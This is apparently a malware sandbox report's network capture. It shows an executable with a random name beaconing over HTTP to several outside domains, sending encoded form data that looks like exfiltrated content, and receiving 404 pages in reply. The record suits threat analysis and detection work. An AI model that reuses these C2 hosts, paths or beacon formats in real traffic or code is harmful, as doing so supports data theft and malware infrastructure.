                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.450030162.0.231.203805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:36.863676071 CET463OUTGET /4ecw/?Q8r=0dQ8CvJEcf0k7N3KGSlLirxY6r92/jsun5G8F0uxw3yzZhCR3PWiA4isvn4XsmdrPPNvoDvZx6QPnXDC61qvR3DkSSTWPVERcD9g8HOA7TMtamwzCoHCAmc=&6trpq=anQT3n HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Host: www.sibeta.info
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Nov 4, 2024 10:12:37.548274994 CET548INHTTP/1.1 404 Not Found
                                                        Date: Mon, 04 Nov 2024 09:12:37 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.450031150.95.254.16805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:43.092669964 CET729OUTPOST /0by3/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.j252mv.site
                                                        Origin: http://www.j252mv.site
                                                        Content-Length: 200
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.j252mv.site/0by3/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 54 64 76 70 44 4b 33 38 4c 2f 58 31 31 76 47 6d 6b 6b 50 30 68 38 64 6d 6d 56 49 71 30 75 79 33 71 64 73 53 72 74 30 47 46 6c 42 37 6f 58 63 46 69 2f 45 65 34 62 38 5a 74 68 72 68 68 2b 63 66 51 4b 56 72 38 47 49 4b 45 2b 34 71 37 75 46 54 4d 75 54 43 6b 4b 34 41 6b 72 34 5a 4e 4d 42 4d 76 30 4c 56 63 34 49 30 4c 58 33 66 48 73 62 73 78 2f 71 39 71 36 47 54 62 54 69 74 4e 58 61 6b 61 73 65 72 67 31 67 30 44 39 47 37 58 42 44 41 68 76 69 71 5a 33 67 58 42 4e 53 63 42 4a 34 62 49 41 78 55 77 72 36 66 6a 70 75 66 37 42 76 66 59 61 68 58 41 49 76 76 30 5a 65 31 31 46 6c 30 45 77 3d 3d
                                                        Data Ascii: Q8r=TdvpDK38L/X11vGmkkP0h8dmmVIq0uy3qdsSrt0GFlB7oXcFi/Ee4b8Zthrhh+cfQKVr8GIKE+4q7uFTMuTCkK4Akr4ZNMBMv0LVc4I0LX3fHsbsx/q9q6GTbTitNXakaserg1g0D9G7XBDAhviqZ3gXBNScBJ4bIAxUwr6fjpuf7BvfYahXAIvv0Ze11Fl0Ew==
                                                        Nov 4, 2024 10:12:43.965040922 CET213INHTTP/1.1 404 Not Found
                                                        Date: Mon, 04 Nov 2024 09:12:43 GMT
                                                        Server: Apache
                                                        Last-Modified: Tue, 13 Sep 2022 05:13:09 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1260
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Nov 4, 2024 10:12:43.965118885 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
                                                        Nov 4, 2024 10:12:43.965128899 CET24INData Raw: 3c 2f 64 69 76 3e 0a 0a 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: </div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.450032150.95.254.16805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:45.647862911 CET749OUTPOST /0by3/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.j252mv.site
                                                        Origin: http://www.j252mv.site
                                                        Content-Length: 220
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.j252mv.site/0by3/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 54 64 76 70 44 4b 33 38 4c 2f 58 31 31 4d 65 6d 6c 46 50 30 6e 63 64 6e 37 6c 49 71 2f 4f 79 7a 71 64 67 53 72 73 77 57 46 54 78 37 6f 32 4d 46 6a 37 51 65 2f 62 38 5a 69 42 72 34 76 65 64 79 51 4b 51 55 38 44 49 4b 45 2b 73 71 37 75 56 54 4d 5a 48 46 6c 61 34 43 76 4c 34 62 48 73 42 4d 76 30 4c 56 63 34 63 4f 4c 57 66 66 48 63 72 73 33 62 65 2b 6a 61 47 55 4c 44 69 74 66 6e 61 6f 61 73 66 4f 67 78 68 66 44 2f 2b 37 58 45 48 41 67 2b 69 74 54 33 67 4f 66 39 53 50 4f 4d 5a 52 51 55 6f 70 2b 71 6d 49 73 62 32 59 7a 6e 69 46 4a 72 41 41 53 49 4c 63 70 65 58 42 34 47 59 39 66 77 64 76 53 6d 61 71 73 38 32 61 34 2f 67 33 69 75 65 31 2b 46 59 3d
                                                        Data Ascii: Q8r=TdvpDK38L/X11MemlFP0ncdn7lIq/OyzqdgSrswWFTx7o2MFj7Qe/b8ZiBr4vedyQKQU8DIKE+sq7uVTMZHFla4CvL4bHsBMv0LVc4cOLWffHcrs3be+jaGULDitfnaoasfOgxhfD/+7XEHAg+itT3gOf9SPOMZRQUop+qmIsb2YzniFJrAASILcpeXB4GY9fwdvSmaqs82a4/g3iue1+FY=
                                                        Nov 4, 2024 10:12:46.548057079 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Mon, 04 Nov 2024 09:12:46 GMT
                                                        Server: Apache
                                                        Last-Modified: Tue, 13 Sep 2022 05:13:09 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1260
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Style-Type" content="text/css"><meta http-equiv="Content-Script-Type" content="text/javascript"><title>404 Error - Not Found</title><style type="text/css"></style></head><body><div id="contents"><center><h1><img src="http://www.gmo.jp/images/public/common/logo.gif" alt="GMO Internet, Inc."></h1><div id="main"><h1 class="title">404 Error - Not Found</h1><p class="detail">URL</p></br></br></br></br></br><a style="text-decoration: underline;" href="http://www.onamae-server.com/" target="_blank">.com </a> </div><div id="footer"></br><a href="http://www.onamae.com/?banner_id=634" target="_blank"> [TRUNCATED]
                                                        Nov 4, 2024 10:12:46.548064947 CET237INData Raw: 81 aa e3 82 89 e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 26 6c 74 3b 50 52 26 67 74 3b 3c 2f 61 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 63 6d 6e 6d 22 3e 47 4d 4f e3 82 a4 e3 83 b3 e3 82 bf e3 83 bc e3 83 8d e3 83 83 e3 83 88 e3 82 b0 e3 83 ab e3 83
                                                        Data Ascii: .com&lt;PR&gt;</a><h4 class="cmnm">GMO</h4><div align="center"><p>Copyright (c) GMO Internet Group, Inc. All Rights Reserved.</p></div></center></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.450033150.95.254.16805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:48.190875053 CET10831OUTPOST /0by3/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.j252mv.site
                                                        Origin: http://www.j252mv.site
                                                        Content-Length: 10300
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.j252mv.site/0by3/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 54 64 76 70 44 4b 33 38 4c 2f 58 31 31 4d 65 6d 6c 46 50 30 6e 63 64 6e 37 6c 49 71 2f 4f 79 7a 71 64 67 53 72 73 77 57 46 51 52 37 70 45 55 46 69 63 73 65 2b 62 38 5a 76 68 72 6c 76 65 64 4b 51 4f 30 51 38 44 4d 38 45 39 55 71 34 4e 4e 54 4f 6f 48 46 73 61 34 43 67 72 34 57 4e 4d 42 38 76 77 6e 52 63 34 4d 4f 4c 57 66 66 48 66 6a 73 33 50 71 2b 76 36 47 54 62 54 69 78 4e 58 62 2f 61 73 48 34 67 78 73 6b 43 50 65 37 58 6b 58 41 6a 4d 4b 74 4f 6e 67 62 65 39 54 53 4f 4d 64 53 51 56 41 79 2b 71 43 75 73 5a 71 59 77 48 76 50 55 4c 63 70 41 4f 66 6c 78 74 6e 31 31 46 45 4e 53 7a 70 54 57 44 2b 6d 2b 4e 32 45 36 49 31 67 79 75 65 6d 67 51 7a 6f 6a 64 37 4e 4d 57 35 79 48 6f 6a 54 62 6a 39 45 36 79 75 6f 53 53 39 35 6f 2b 2b 30 50 6f 6a 2f 2b 4c 6a 35 72 7a 4a 71 46 78 57 30 78 35 37 4f 75 66 74 72 58 61 53 6b 69 44 59 6c 6c 74 71 53 4b 45 4d 44 52 63 79 4f 35 73 51 61 61 33 4b 76 47 66 62 45 74 4f 6b 42 31 66 7a 45 2b 65 68 43 7a 51 75 61 68 42 49 4a 67 34 61 4d 43 72 76 55 65 78 67 32 57 46 [TRUNCATED]
                                                        Data Ascii: Q8r=TdvpDK38L/X11MemlFP0ncdn7lIq/OyzqdgSrswWFQR7pEUFicse+b8ZvhrlvedKQO0Q8DM8E9Uq4NNTOoHFsa4Cgr4WNMB8vwnRc4MOLWffHfjs3Pq+v6GTbTixNXb/asH4gxskCPe7XkXAjMKtOngbe9TSOMdSQVAy+qCusZqYwHvPULcpAOflxtn11FENSzpTWD+m+N2E6I1gyuemgQzojd7NMW5yHojTbj9E6yuoSS95o++0Poj/+Lj5rzJqFxW0x57OuftrXaSkiDYlltqSKEMDRcyO5sQaa3KvGfbEtOkB1fzE+ehCzQuahBIJg4aMCrvUexg2WFdAtBB42NZC+Dp61w4te+APKkveq6uIY4K36Sy+QVe3h2HrqLpIfdOSlfam1Khrtn9k2KbuZAEX90QJQ+HyGWoMcb9+6o2BwwdBMLyge44E8zRJNUSmgQrS0kEekddyr083n0lRmABZVw9YAXzkFwXl/AgHOTrv4G1lpQgDATdwVZBDlrxUi71BxRrS6HrpFamd92oxXFfHyw2W8GVlMm3BpZcWtTfjZdd1fGD6JEDxnMMgES4WDwuis/iSdcCJvN0+X2xq7B9ztXjpB3dZkWiPSUIkwEz7XRRxI8w5RpeBWLf63xYl5nULv+Iqdt5NO4R0KMikTUihyuClSX+QML8eTvzKqho+MaeSoV+lKI1FrAg/zXytd4moW/IZjRhmQLytHI7QkoHn/GTorW9xWcWBFWZuF6R2yb2RR0gLauE5985vTNxVX7ELI5b4uzKi6DuCn9kYH923kwfElLpkY88mE6RN0L9pbFk9hCC/Bs6FQBuCeNPWFI32+G05T2slfH8+ZuaYNHhmObiYPZ4b1Pw2ZOtn0OxUJxecgrU2K+260+KeiPtnAdOjU5DW99q4GzUrouNZfY4tQv7k1dqD1nsh9iuoMp5VnaxuYCY62qAfpuNUAvKRqdxR8yEpYAO/iiBiZxUg3ob7kkOGGVIwHl2FT2fv4GaqpqDo [TRUNCATED]
                                                        Nov 4, 2024 10:12:49.047112942 CET213INHTTP/1.1 404 Not Found
                                                        Date: Mon, 04 Nov 2024 09:12:48 GMT
                                                        Server: Apache
                                                        Last-Modified: Tue, 13 Sep 2022 05:13:09 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1260
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Nov 4, 2024 10:12:49.047303915 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><me
                                                        Nov 4, 2024 10:12:49.047308922 CET24INData Raw: 3c 2f 64 69 76 3e 0a 0a 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: </div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.450034150.95.254.16805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:50.732224941 CET463OUTGET /0by3/?Q8r=efHJA933MNzr/PW0mnuDq9Bq5Tko85ea564Kp9U5FyRJkGEFhbQl4J8Qjgja2f9fM8RihmJcYOokucUKLubMlM0irYAtLesM+0DLZZlGElvWUt69+LazkvU=&6trpq=anQT3n HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Host: www.j252mv.site
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Nov 4, 2024 10:12:51.582786083 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Mon, 04 Nov 2024 09:12:51 GMT
                                                        Server: Apache
                                                        Last-Modified: Tue, 13 Sep 2022 05:13:09 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1260
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Style-Type" content="text/css"><meta http-equiv="Content-Script-Type" content="text/javascript"><title>404 Error - Not Found</title><style type="text/css"></style></head><body><div id="contents"><center><h1><img src="http://www.gmo.jp/images/public/common/logo.gif" alt="GMO Internet, Inc."></h1><div id="main"><h1 class="title">404 Error - Not Found</h1><p class="detail">URL</p></br></br></br></br></br><a style="text-decoration: underline;" href="http://www.onamae-server.com/" target="_blank">.com </a> </div><div id="footer"></br><a href="http://www.onamae.com/?banner_id=634" target="_blank"> [TRUNCATED]
                                                        Nov 4, 2024 10:12:51.582798958 CET237INData Raw: 81 aa e3 82 89 e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 26 6c 74 3b 50 52 26 67 74 3b 3c 2f 61 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 63 6d 6e 6d 22 3e 47 4d 4f e3 82 a4 e3 83 b3 e3 82 bf e3 83 bc e3 83 8d e3 83 83 e3 83 88 e3 82 b0 e3 83 ab e3 83
                                                        Data Ascii: .com&lt;PR&gt;</a><h4 class="cmnm">GMO</h4><div align="center"><p>Copyright (c) GMO Internet Group, Inc. All Rights Reserved.</p></div></center></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.4500353.33.130.190805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:56.792522907 CET750OUTPOST /kz8j/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.dwmdconsulting.llc
                                                        Origin: http://www.dwmdconsulting.llc
                                                        Content-Length: 200
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.dwmdconsulting.llc/kz8j/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 64 69 69 4d 2f 56 53 4c 70 53 45 79 39 6b 6a 54 36 31 4a 68 53 57 36 68 44 42 6a 4c 4e 63 4b 75 58 6d 44 37 42 31 63 50 54 76 56 35 43 31 6a 4b 6a 2f 41 76 49 35 56 4f 64 30 70 66 32 2b 78 5a 70 38 55 32 48 78 59 64 68 4f 4c 38 4d 6d 45 79 6d 4f 35 35 70 75 51 62 4d 4e 35 6d 54 73 48 47 45 36 57 49 4f 42 35 67 4e 79 69 51 75 51 74 38 4e 2b 65 53 62 74 6c 57 56 47 4e 7a 36 75 59 41 77 4f 53 6b 76 7a 49 47 73 69 6d 37 4a 47 31 56 4d 6f 48 77 50 57 74 59 35 54 44 6a 77 58 58 6e 53 45 47 63 63 2b 2b 50 73 4b 57 2b 65 37 6d 34 64 5a 2f 55 4b 6a 4f 41 5a 2f 79 4b 4f 31 6f 4e 4d 77 3d 3d
                                                        Data Ascii: Q8r=diiM/VSLpSEy9kjT61JhSW6hDBjLNcKuXmD7B1cPTvV5C1jKj/AvI5VOd0pf2+xZp8U2HxYdhOL8MmEymO55puQbMN5mTsHGE6WIOB5gNyiQuQt8N+eSbtlWVGNz6uYAwOSkvzIGsim7JG1VMoHwPWtY5TDjwXXnSEGcc++PsKW+e7m4dZ/UKjOAZ/yKO1oNMw==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.4500363.33.130.190805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:59.346471071 CET770OUTPOST /kz8j/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.dwmdconsulting.llc
                                                        Origin: http://www.dwmdconsulting.llc
                                                        Content-Length: 220
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.dwmdconsulting.llc/kz8j/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 64 69 69 4d 2f 56 53 4c 70 53 45 79 39 42 7a 54 37 53 56 68 44 6d 36 69 47 42 6a 4c 55 4d 4b 71 58 6d 50 37 42 30 70 53 55 61 6c 35 43 51 48 4b 67 2b 41 76 64 35 56 4f 46 6b 70 61 70 4f 78 53 70 38 70 4c 48 31 59 64 68 4f 66 38 4d 6e 30 79 6e 39 68 36 37 4f 51 64 46 74 35 34 58 73 48 47 45 36 57 49 4f 42 74 65 4e 79 36 51 75 67 39 38 4d 62 79 52 54 4e 6c 52 46 57 4e 7a 72 2b 5a 48 77 4f 53 6a 76 79 55 38 73 6b 71 37 4a 48 46 56 4d 39 37 7a 42 57 74 61 33 7a 43 4a 32 33 4b 46 53 78 50 4f 56 64 79 63 79 61 47 47 66 39 72 69 4d 6f 65 44 59 6a 71 7a 45 34 37 2b 44 32 56 45 58 31 68 79 69 44 69 62 6d 67 68 41 6d 31 6c 74 55 41 4d 64 76 69 77 3d
                                                        Data Ascii: Q8r=diiM/VSLpSEy9BzT7SVhDm6iGBjLUMKqXmP7B0pSUal5CQHKg+Avd5VOFkpapOxSp8pLH1YdhOf8Mn0yn9h67OQdFt54XsHGE6WIOBteNy6Qug98MbyRTNlRFWNzr+ZHwOSjvyU8skq7JHFVM97zBWta3zCJ23KFSxPOVdycyaGGf9riMoeDYjqzE47+D2VEX1hyiDibmghAm1ltUAMdviw=


